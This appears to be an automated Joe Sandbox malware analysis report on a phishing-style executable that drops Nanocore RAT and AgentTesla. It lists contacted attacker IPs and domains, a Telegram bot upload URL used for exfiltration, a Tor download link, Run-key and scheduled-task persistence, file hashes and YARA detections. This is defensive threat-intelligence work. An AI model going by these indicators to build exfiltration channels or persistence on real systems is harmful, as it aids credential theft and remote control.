                                                • Avira URL Cloud: safe
                                                unknown
                                                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameConsignment Document PL&BL Draft.exe, 00000000.00000002.234335225.0000000003011000.00000004.00000001.sdmp, Isgeprf.exe, 00000004.00000002.263961602.0000000002B9E000.00000004.00000001.sdmpfalse
                                                  high
                                                  http://www.sakkal.comConsignment Document PL&BL Draft.exe, 00000000.00000002.242238829.00000000071D2000.00000004.00000001.sdmp, Consignment Document PL&BL Draft.exe, 00000001.00000002.254479506.00000000062C0000.00000002.00000001.sdmp, Rczgwoxvqzh.exe, 00000002.00000002.253621954.000000001BBD0000.00000002.00000001.sdmpfalse
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  unknown
                                                  https://api.telegram.org/bot%telegramapi%/sendDocumentdocument---------------------------xFdquqwatjjr.exe, 00000005.00000002.489191413.00000000028C1000.00000004.00000001.sdmpfalse
                                                    high
                                                    https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zipRczgwoxvqzh.exe, 00000002.00000002.245249289.0000000002E91000.00000004.00000001.sdmp, Fdquqwatjjr.exe, Fdquqwatjjr.exe.2.drfalse
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    unknown

                                                    Contacted IPs

                                                    • No. of IPs < 25%
                                                    • 25% < No. of IPs < 50%
                                                    • 50% < No. of IPs < 75%
                                                    • 75% < No. of IPs

                                                    Public

                                                    IPDomainCountryFlagASNASN NameMalicious
                                                    85.187.154.178
                                                    unknownUnited States
                                                    55293A2HOSTINGUStrue
                                                    172.94.25.202
                                                    unknownUnited States
                                                    9009M247GBfalse

                                                    General Information

                                                    Joe Sandbox Version:31.0.0 Red Diamond
                                                    Analysis ID:326301
                                                    Start date:03.12.2020
                                                    Start time:09:30:13
                                                    Joe Sandbox Product:CloudBasic
                                                    Overall analysis duration:0h 13m 37s
                                                    Hypervisor based Inspection enabled:false
                                                    Report type:light
                                                    Sample file name:Consignment Document PL&BL Draft.exe
                                                    Cookbook file name:default.jbs
                                                    Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                    Number of analysed new started processes analysed:36
                                                    Number of new started drivers analysed:0
                                                    Number of existing processes analysed:0
                                                    Number of existing drivers analysed:0
                                                    Number of injected processes analysed:0
                                                    Technologies:
                                                    • HCA enabled
                                                    • EGA enabled
                                                    • HDC enabled
                                                    • AMSI enabled
                                                    Analysis Mode:default
                                                    Analysis stop reason:Timeout
                                                    Detection:MAL
                                                    Classification:mal100.troj.spyw.evad.winEXE@26/14@13/2
                                                    EGA Information:Failed
                                                    HDC Information:
                                                    • Successful, ratio: 0.3% (good quality ratio 0.2%)
                                                    • Quality average: 36.2%
                                                    • Quality standard deviation: 34.8%
                                                    HCA Information:
                                                    • Successful, ratio: 100%
                                                    • Number of executed functions: 0
                                                    • Number of non-executed functions: 0
                                                    Cookbook Comments:
                                                    • Adjust boot time
                                                    • Enable AMSI
                                                    • Found application associated with file extension: .exe
                                                    Warnings:
                                                    Show All
                                                    • Behavior information exceeds normal sizes, reducing to normal. Report will have missing behavior information.
                                                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe, UsoClient.exe
                                                    • Excluded IPs from analysis (whitelisted): 104.42.151.234, 40.88.32.150, 51.11.168.160, 92.122.144.200, 20.54.26.129, 92.122.213.194, 92.122.213.247, 13.88.21.125, 51.104.139.180, 104.43.139.144
                                                    • Excluded domains from analysis (whitelisted): arc.msn.com.nsatc.net, fs.microsoft.com, ris-prod.trafficmanager.net, e1723.g.akamaiedge.net, skypedataprdcolcus16.cloudapp.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, ris.api.iris.microsoft.com, skypedataprdcoleus15.cloudapp.net, blobcollector.events.data.trafficmanager.net, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, skypedataprdcolwus16.cloudapp.net, skypedataprdcolwus15.cloudapp.net
                                                    • Report creation exceeded maximum time and may have missing disassembly code information.
                                                    • Report size exceeded maximum capacity and may have missing behavior information.
                                                    • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                                    • Report size getting too big, too many NtQueryValueKey calls found.
                                                    • Report size getting too big, too many NtReadVirtualMemory calls found.

                                                    Simulations

                                                    Behavior and APIs

                                                    TimeTypeDescription
                                                    09:31:13API Interceptor20x Sleep call for process: Consignment Document PL&BL Draft.exe modified
                                                    09:31:20API Interceptor937x Sleep call for process: Icda.exe modified
                                                    09:31:24AutostartRun: HKLM\Software\Microsoft\Windows\CurrentVersion\Run DHCP Monitor C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe
                                                    09:31:30Task SchedulerRun new task: VLC2 path: "C:\Users\user\AppData\Local\Temp\VLC2.exe"
                                                    09:31:32API Interceptor753x Sleep call for process: Fdquqwatjjr.exe modified

                                                    Joe Sandbox View / Context

                                                    IPs

                                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                    85.187.154.178Purchase Order.exeGet hashmaliciousBrowse
                                                      SHIPPING DOCUMENT PL&BL DRAFT.EXEGet hashmaliciousBrowse
                                                        Shipping Document PLBL Draft.exeGet hashmaliciousBrowse
                                                          Inquiry-20201130095115.exeGet hashmaliciousBrowse
                                                            2hXlfEl7ClfpfY1.exeGet hashmaliciousBrowse
                                                              Inquiry-20201118105427.exeGet hashmaliciousBrowse
                                                                EMMYDON.exeGet hashmaliciousBrowse
                                                                  OUTSTANDING INVOICE_pdf.exeGet hashmaliciousBrowse
                                                                    VeiRTphBRH.exeGet hashmaliciousBrowse
                                                                      DHL RECEIPT_pdf.exeGet hashmaliciousBrowse
                                                                        RFQ-1324455663 API 5L X 60.exeGet hashmaliciousBrowse
                                                                          DHL INVOICE_pdf.exeGet hashmaliciousBrowse
                                                                            sxs73zrn8P.exeGet hashmaliciousBrowse
                                                                              ARCHIVE DOC.exeGet hashmaliciousBrowse
                                                                                Consignment Details.exeGet hashmaliciousBrowse
                                                                                  Original Receipt PL&BL Draft.exeGet hashmaliciousBrowse
                                                                                    RFQ-DOC-112020.exeGet hashmaliciousBrowse
                                                                                      Gironex 2 9503 Order XLSX.exeGet hashmaliciousBrowse
                                                                                        Order 17034 PDF.exeGet hashmaliciousBrowse
                                                                                          RFQ 29-9-20.exeGet hashmaliciousBrowse
                                                                                            172.94.25.202Shipping Document PLBL Draft.exeGet hashmaliciousBrowse
                                                                                              Inquiry-20201130095115.exeGet hashmaliciousBrowse

                                                                                                Domains

                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                centurygift.myq-see.comShipping Document PLBL Draft.exeGet hashmaliciousBrowse
                                                                                                • 172.94.25.202
                                                                                                Inquiry-20201130095115.exeGet hashmaliciousBrowse
                                                                                                • 172.94.25.202
                                                                                                bGtm3bQKUj.exeGet hashmaliciousBrowse
                                                                                                • 194.5.98.122
                                                                                                Inquiry-20201109093216.exeGet hashmaliciousBrowse
                                                                                                • 198.50.243.167

                                                                                                ASN

                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                A2HOSTINGUSPurchase Order.exeGet hashmaliciousBrowse
                                                                                                • 85.187.154.178
                                                                                                SHIPPING DOCUMENT PL&BL DRAFT.EXEGet hashmaliciousBrowse
                                                                                                • 85.187.154.178
                                                                                                invoice.xlsGet hashmaliciousBrowse
                                                                                                • 70.32.23.26
                                                                                                invoice.xlsGet hashmaliciousBrowse
                                                                                                • 70.32.23.26
                                                                                                SecuriteInfo.com.Exploit.Siggen3.3350.20871.xlsGet hashmaliciousBrowse
                                                                                                • 70.32.23.26
                                                                                                SecuriteInfo.com.Exploit.Siggen3.3382.23842.xlsGet hashmaliciousBrowse
                                                                                                • 70.32.23.26
                                                                                                SecuriteInfo.com.Exploit.Siggen3.3382.23842.xlsGet hashmaliciousBrowse
                                                                                                • 70.32.23.26
                                                                                                SecuriteInfo.com.Exploit.Siggen3.2041.29340.xlsGet hashmaliciousBrowse
                                                                                                • 70.32.23.26
                                                                                                Shipping Document PLBL Draft.exeGet hashmaliciousBrowse
                                                                                                • 85.187.154.178
                                                                                                Inquiry-20201130095115.exeGet hashmaliciousBrowse
                                                                                                • 85.187.154.178
                                                                                                invoice.xlsGet hashmaliciousBrowse
                                                                                                • 70.32.23.26
                                                                                                invoice.xlsGet hashmaliciousBrowse
                                                                                                • 70.32.23.26
                                                                                                2020-11-27-ZLoader-DLL-example-01.dllGet hashmaliciousBrowse
                                                                                                • 70.32.23.26
                                                                                                2020-11-27-ZLoader-DLL-example-02.dllGet hashmaliciousBrowse
                                                                                                • 70.32.23.26
                                                                                                2020-11-27-ZLoader-DLL-example-03.dllGet hashmaliciousBrowse
                                                                                                • 70.32.23.26
                                                                                                invoice.xlsGet hashmaliciousBrowse
                                                                                                • 70.32.23.26
                                                                                                invoice.xlsGet hashmaliciousBrowse
                                                                                                • 70.32.23.26
                                                                                                invoice.xlsGet hashmaliciousBrowse
                                                                                                • 70.32.23.26
                                                                                                https://showmewhatyouhave.com/wp-includes/ID3/ASB/?email=kmcpherson@deloitte.co.nzGet hashmaliciousBrowse
                                                                                                • 68.66.226.85
                                                                                                2hXlfEl7ClfpfY1.exeGet hashmaliciousBrowse
                                                                                                • 85.187.154.178
                                                                                                M247GB5fc612703f844.dllGet hashmaliciousBrowse
                                                                                                • 89.44.9.160
                                                                                                QUOTATION MD20-2097.exeGet hashmaliciousBrowse
                                                                                                • 89.249.74.213
                                                                                                Shipping Document PLBL Draft.exeGet hashmaliciousBrowse
                                                                                                • 172.94.25.202
                                                                                                Inquiry-20201130095115.exeGet hashmaliciousBrowse
                                                                                                • 172.94.25.202
                                                                                                payment_APEK201128.exeGet hashmaliciousBrowse
                                                                                                • 89.249.74.213
                                                                                                QUOTE#450009123.exeGet hashmaliciousBrowse
                                                                                                • 89.249.74.213
                                                                                                Paymentreportadvice.exeGet hashmaliciousBrowse
                                                                                                • 89.249.74.213
                                                                                                PaymentRemittanceInfo.exeGet hashmaliciousBrowse
                                                                                                • 89.249.74.213
                                                                                                ORDER-207044.xLs.exeGet hashmaliciousBrowse
                                                                                                • 37.120.208.36
                                                                                                SIC - 127476.exeGet hashmaliciousBrowse
                                                                                                • 89.249.74.213
                                                                                                Wire tranfer_report.exeGet hashmaliciousBrowse
                                                                                                • 89.249.74.213
                                                                                                5fbce6bbc8cc4png.dllGet hashmaliciousBrowse
                                                                                                • 89.44.9.160
                                                                                                Horizontal band saw KESMAK - ATMH KSY 1600 x 2500.jarGet hashmaliciousBrowse
                                                                                                • 37.120.145.150
                                                                                                Horizontal band saw KESMAK - ATMH KSY 1600 x 2500.jarGet hashmaliciousBrowse
                                                                                                • 37.120.145.150
                                                                                                FedEx AWB #2893627763.24.11.20.jarGet hashmaliciousBrowse
                                                                                                • 193.29.104.194
                                                                                                FedEx AWB #2893627763.24.11.20.jarGet hashmaliciousBrowse
                                                                                                • 193.29.104.194
                                                                                                http://bazaarkonections.com/admin/li.exeGet hashmaliciousBrowse
                                                                                                • 95.215.225.23
                                                                                                ORDER #201120A.exeGet hashmaliciousBrowse
                                                                                                • 37.120.208.36
                                                                                                ORDER #0649.exeGet hashmaliciousBrowse
                                                                                                • 37.120.208.36
                                                                                                ORDER #02676.doc.exeGet hashmaliciousBrowse
                                                                                                • 37.120.208.37

                                                                                                JA3 Fingerprints

                                                                                                No context

                                                                                                Dropped Files

                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                C:\Users\user\AppData\Local\Temp\Fdquqwatjjr.exeShipping Document PLBL Draft.exeGet hashmaliciousBrowse
                                                                                                  Inquiry-20201130095115.exeGet hashmaliciousBrowse
                                                                                                    C:\Users\user\AppData\Local\Temp\Icda.exeShipping Document PLBL Draft.exeGet hashmaliciousBrowse
                                                                                                      Inquiry-20201130095115.exeGet hashmaliciousBrowse
                                                                                                        C:\Users\user\AppData\Local\Temp\Rczgwoxvqzh.exeShipping Document PLBL Draft.exeGet hashmaliciousBrowse
                                                                                                          Inquiry-20201130095115.exeGet hashmaliciousBrowse
                                                                                                            C:\Users\user\AppData\Local\Temp\Isgeprf.exeShipping Document PLBL Draft.exeGet hashmaliciousBrowse
                                                                                                              Inquiry-20201130095115.exeGet hashmaliciousBrowse
                                                                                                                C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeShipping Document PLBL Draft.exeGet hashmaliciousBrowse
                                                                                                                  Inquiry-20201130095115.exeGet hashmaliciousBrowse

                                                                                                                    Created / dropped Files

                                                                                                                    C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe
                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\Icda.exe
                                                                                                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):207360
                                                                                                                    Entropy (8bit):7.449292674421311
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:3072:QzEqV6B1jHa6dtJ10jgvzcgi+oG/j9iaMP2s/HIfjVo9EPPKchNdXM3gskyeOA:QLV6Bta6dtJmakIM5QWKagyrA
                                                                                                                    MD5:BB21F995740D8BC1549D9CBC32874DD8
                                                                                                                    SHA1:8C53B645027362EC97C15735EEB39A12D62C8A74
                                                                                                                    SHA-256:9589565F7BEB6DCCFE4F8424455271BBF810182EA94DACBC8C081577E34A51E1
                                                                                                                    SHA-512:608E1871476D3534D9C7BC1951CCC4ABBB3056F57D3C64BEB1D13B8A453DE7B113001C70C0A1728A2776538D464893990A88035B2FB34254F24927E4536AE24B
                                                                                                                    Malicious:true
                                                                                                                    Yara Hits:
                                                                                                                    • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe, Author: Florian Roth
                                                                                                                    • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe, Author: Florian Roth
                                                                                                                    • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe, Author: Joe Security
                                                                                                                    • Rule: NanoCore, Description: unknown, Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe, Author: Kevin Breen <kevin@techanarchy.net>
                                                                                                                    Antivirus:
                                                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                    • Antivirus: ReversingLabs, Detection: 94%
                                                                                                                    Joe Sandbox View:
                                                                                                                    • Filename: Shipping Document PLBL Draft.exe, Detection: malicious, Browse
                                                                                                                    • Filename: Inquiry-20201130095115.exe, Detection: malicious, Browse
                                                                                                                    Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....'.T.....................`........... ........@.. ......................................................................8...W.... ...]........................................................................... ............... ..H............text........ ...................... ..`.reloc..............................@..B.rsrc....]... ...^..................@..@................t.......H...........T............................................................0..Q........o5.......*.o6....-.&......3+..+.... ....3......1..... 2.... ....3.... .......*.*....0..E.......s7....-(&s8....-&&s9....,$&s:........s;........*.....+.....+.....+.....0..........~....o<...*..0..........~....o=...*..0..........~....o>...*..0..........~....o?...*..0..........~....o@...*..0.............-.&(A...*&+...0..$.......~B........-.(...+.-.&+..B...+.~B...*.0.............-.&(A...*&+...0..
                                                                                                                    C:\Users\user\AppData\Local\Microsoft\CLR_v2.0_32\UsageLogs\dhcpmon.exe.log
                                                                                                                    Process:C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe
                                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):525
                                                                                                                    Entropy (8bit):5.2874233355119316
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:12:Q3LaJU20NaL10U29hJ5g1B0U2ukyrFk70Ug+9Yz9tv:MLF20NaL329hJ5g522rWz2T
                                                                                                                    MD5:61CCF53571C9ABA6511D696CB0D32E45
                                                                                                                    SHA1:A13A42A20EC14942F52DB20FB16A0A520F8183CE
                                                                                                                    SHA-256:3459BDF6C0B7F9D43649ADAAF19BA8D5D133BCBE5EF80CF4B7000DC91E10903B
                                                                                                                    SHA-512:90E180D9A681F82C010C326456AC88EBB89256CC769E900BFB4B2DF92E69CA69726863B45DFE4627FC1EE8C281F2AF86A6A1E2EF1710094CCD3F4E092872F06F
                                                                                                                    Malicious:false
                                                                                                                    Preview: 1,"fusion","GAC",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_32\System\1ffc437de59fb69ba2b865ffdc98ffd1\System.ni.dll",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Drawing\54d944b3ca0ea1188d700fbd8089726b\System.Drawing.ni.dll",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Windows.Forms\bd8d59c984c9f5f2695f64341115cdf0\System.Windows.Forms.ni.dll",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_32\Microsoft.VisualBas#\cd7c74fce2a0eab72cd25cbe4bb61614\Microsoft.VisualBasic.ni.dll",0..
                                                                                                                    C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\Rczgwoxvqzh.exe.log
                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\Rczgwoxvqzh.exe
                                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):1281
                                                                                                                    Entropy (8bit):5.367899416177239
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:24:ML9E4KrL1qE4GiD0E4KeGiKDE4KGKN08AKhPKIE4TKD1KoZAE4KKPz:MxHKn1qHGiD0HKeGiYHKGD8AoPtHTG1Q
                                                                                                                    MD5:7115A3215A4C22EF20AB9AF4160EE8F5
                                                                                                                    SHA1:A4CAB34355971C1FBAABECEFA91458C4936F2C24
                                                                                                                    SHA-256:A4A689E8149166591F94A8C84E99BE744992B9E80BDB7A0713453EB6C59BBBB2
                                                                                                                    SHA-512:2CEF2BCD284265B147ABF300A4D26AD1AAC743EFE0B47A394FB614B6843A60B9F918E56261A56334078D0D9681132F3403FB734EE66E1915CF76F29411D5CE20
                                                                                                                    Malicious:false
                                                                                                                    Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\10a17139182a9efd561f01fada9688a5\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\49e5c0579db170be9741dccc34c1998e\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\6d7d43e19d7fc0006285b85b7e2c8702\System.Windows.Forms.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\4e05e2e48b8a6dd267a8c9e25ef129a7\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\S
                                                                                                                    C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Consignment Document PL&BL Draft.exe.log
                                                                                                                    Process:C:\Users\user\Desktop\Consignment Document PL&BL Draft.exe
                                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):1301
                                                                                                                    Entropy (8bit):5.345637324625647
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:24:MLUE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4VE4x84j:MIHK5HKXE1qHiYHKhQnoPtHoxHhAHKz5
                                                                                                                    MD5:6C42AAF2F2FABAD2BAB70543AE48CEDB
                                                                                                                    SHA1:8552031F83C078FE1C035191A32BA43261A63DA9
                                                                                                                    SHA-256:51D07DD061EA9665DA070B95A4AC2AC17E20524E30BF6A0DA8381C2AF29CA967
                                                                                                                    SHA-512:014E89857B811765EA7AA0B030AB04A2DA1957571608C4512EC7662F6A4DCE8B0409626624DABC96CBFF079E7F0F4A916E6F49C789E00B6E46AD37C36C806DCA
                                                                                                                    Malicious:true
                                                                                                                    Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21
                                                                                                                    C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Isgeprf.exe.log
                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\Isgeprf.exe
                                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):522
                                                                                                                    Entropy (8bit):5.348034597186669
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:12:Q3La/KDLI4MWuPk21OKbbDLI4MWuPJKiUrRZ9I0ZKhat92n4M6:ML9E4Ks2wKDE4KhK3VZ9pKhg84j
                                                                                                                    MD5:07FC10473CB7F0DEC42EE8079EB0DF28
                                                                                                                    SHA1:90FA6D0B604991B3E5E8F6DB041651B10FD4284A
                                                                                                                    SHA-256:A42B61DFB4AF366D05CE1815C88E2392C7C4AA9B6B17604234BEB7A7DADA7E4C
                                                                                                                    SHA-512:D7240EE88D207E631990907AFA96C8384FB51729A16247BD4BDB96CBA3C4CDB9A68ADCD07819B2242A0F395690AD831B1B547EC91E988CBE39398F472055D56F
                                                                                                                    Malicious:false
                                                                                                                    Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..
                                                                                                                    C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\VLC2.exe.log
                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\VLC2.exe
                                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):425
                                                                                                                    Entropy (8bit):5.340009400190196
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:12:Q3La/KDLI4MWuPk21OKbbDLI4MWuPJKiUrRZ9I0ZKhav:ML9E4Ks2wKDE4KhK3VZ9pKhk
                                                                                                                    MD5:CC144808DBAF00E03294347EADC8E779
                                                                                                                    SHA1:A3434FC71BA82B7512C813840427C687ADDB5AEA
                                                                                                                    SHA-256:3FC7B9771439E777A8F8B8579DD499F3EB90859AD30EFD8A765F341403FC7101
                                                                                                                    SHA-512:A4F9EB98200BCAF388F89AABAF7EA57661473687265597B13192C24F06638C6339A3BD581DF4E002F26EE1BA09410F6A2BBDB4DA0CD40B59D63A09BAA1AADD3D
                                                                                                                    Malicious:false
                                                                                                                    Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..
                                                                                                                    C:\Users\user\AppData\Local\Temp\Fdquqwatjjr.exe
                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\Rczgwoxvqzh.exe
                                                                                                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):219648
                                                                                                                    Entropy (8bit):6.069728788301543
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:3072:jGW32XuumXzok4CeyFZdUCEpBQxm+uITVLmfOfaXSwN1SQYBy3t7rH:j7oQe0TUrPIhAWppRMd7
                                                                                                                    MD5:E8DC83A4ED7657D3211077B7F343FC3C
                                                                                                                    SHA1:0AF6CB0CA0D55A2EC6626443B5D91F9C0D0C332C
                                                                                                                    SHA-256:C0791632452FD17FDB08B4241AD7B6F5AAF1AF6190861301135EF3631F4B4020
                                                                                                                    SHA-512:F37155BE17E744B46CB76F746EC8D02E7D6F0EC8B3D8CAA583081504E15674B9C1BB5E3061B149AEB599325293959704064B3512F156797C1F5046289E41125C
                                                                                                                    Malicious:true
                                                                                                                    Yara Hits:
                                                                                                                    • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: C:\Users\user\AppData\Local\Temp\Fdquqwatjjr.exe, Author: Joe Security
                                                                                                                    Antivirus:
                                                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                    • Antivirus: ReversingLabs, Detection: 67%
                                                                                                                    Joe Sandbox View:
                                                                                                                    • Filename: Shipping Document PLBL Draft.exe, Detection: malicious, Browse
                                                                                                                    • Filename: Inquiry-20201130095115.exe, Detection: malicious, Browse
                                                                                                                    Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......_.................P..........>o... ........@.. ....................................@..................................n..K.......P............................................................................ ............... ..H............text...DO... ...P.................. ..`.rsrc...P............R..............@..@.reloc...............X..............@..B................ o......H.........................................................................(....*..(....*.s.........s.........s.........s.........*...0..,.........+......,........,........,.+.+.~....o....*.0..,.........+......,........,........,.+.+.~....o....*.0..,.........+......,........,........,.+.+.~....o....*.0..,.........+......,........,........,.+.+.~....o....*.0............+......,........,........,.+.+...(....(....*...0..(.........+......,........,........,.+.+..(....*.0..,.......
                                                                                                                    C:\Users\user\AppData\Local\Temp\Icda.exe
                                                                                                                    Process:C:\Users\user\Desktop\Consignment Document PL&BL Draft.exe
                                                                                                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):207360
                                                                                                                    Entropy (8bit):7.449292674421311
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:3072:QzEqV6B1jHa6dtJ10jgvzcgi+oG/j9iaMP2s/HIfjVo9EPPKchNdXM3gskyeOA:QLV6Bta6dtJmakIM5QWKagyrA
                                                                                                                    MD5:BB21F995740D8BC1549D9CBC32874DD8
                                                                                                                    SHA1:8C53B645027362EC97C15735EEB39A12D62C8A74
                                                                                                                    SHA-256:9589565F7BEB6DCCFE4F8424455271BBF810182EA94DACBC8C081577E34A51E1
                                                                                                                    SHA-512:608E1871476D3534D9C7BC1951CCC4ABBB3056F57D3C64BEB1D13B8A453DE7B113001C70C0A1728A2776538D464893990A88035B2FB34254F24927E4536AE24B
                                                                                                                    Malicious:true
                                                                                                                    Yara Hits:
                                                                                                                    • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: C:\Users\user\AppData\Local\Temp\Icda.exe, Author: Florian Roth
                                                                                                                    • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: C:\Users\user\AppData\Local\Temp\Icda.exe, Author: Florian Roth
                                                                                                                    • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: C:\Users\user\AppData\Local\Temp\Icda.exe, Author: Joe Security
                                                                                                                    • Rule: NanoCore, Description: unknown, Source: C:\Users\user\AppData\Local\Temp\Icda.exe, Author: Kevin Breen <kevin@techanarchy.net>
                                                                                                                    Antivirus:
                                                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
